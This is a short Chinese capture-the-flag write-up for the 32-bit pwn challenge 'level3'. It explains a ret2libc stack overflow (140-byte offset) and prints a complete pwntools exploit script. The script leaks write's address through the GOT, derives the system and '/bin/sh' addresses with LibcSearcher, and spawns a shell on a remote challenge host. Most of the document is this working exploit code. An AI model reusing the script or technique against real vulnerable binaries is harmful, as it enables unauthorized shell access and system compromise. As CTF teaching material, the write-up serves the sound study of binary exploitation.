checksec level3
./level3
ida,无system无binsh,要通过泄露write函数来泄露libc版本,才能找到system和binsh的地址。
第一次溢出返回到write函数执行write(1,write_got,4)得到write的真实地址,计算得到system跟"/bin/sh"的真实地址,然后再返回到vulnerable_function函数,第二次回到溢出点,覆盖返回地址到system执行system("/bin/sh")
栈溢出
gdb爆偏移为140
脚本为
#-*-coding:utf-8-*-
#!/usr/bin/env python
from pwn import *
from LibcSearcher import LibcSearcher
import pwnlib
context.terminal=['gnome-terminal','-x','sh','-c']
sh = remote("111.198.29.45","39255")
#sh = process('./level3')
elf = ELF('./level3')
write_plt = 0x08048340#write_plt = elf.plt['write']
write_got = 0x0804A018#write_got = elf.got['write']
vuln = 0x0804844B
print "write_plt =",hex(write_plt)
print "vuln =",hex(vuln)
print "leak write_got addr and return to vulnerable function again"
payload = ''
payload += 'A'*140
payload += p32(write_plt)
payload += p32(vuln)
payload += p32(1) + p32(write_got) + p32(4)
#gdb.attach(sh)
sh.sendlineafter(':\n', payload)
print "get the related addr"
write_addr = u32(sh.recv()[0:4])
print "write_addr =",hex(write_addr)
libc = LibcSearcher('write',write_addr)
libcbase = write_addr - libc.dump('write')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
print "libcbase =",hex(libcbase)
print "system_addr =",hex(system_addr)
print "binsh_addr =",hex(binsh_addr)
print "getshell"
payload = ''
payload += 'A'*140
payload += p32(system_addr)
payload += p32(0xdeadbeef)
payload += p32(binsh_addr)
sh.sendline(payload)
sh.interactive()
成功
网友评论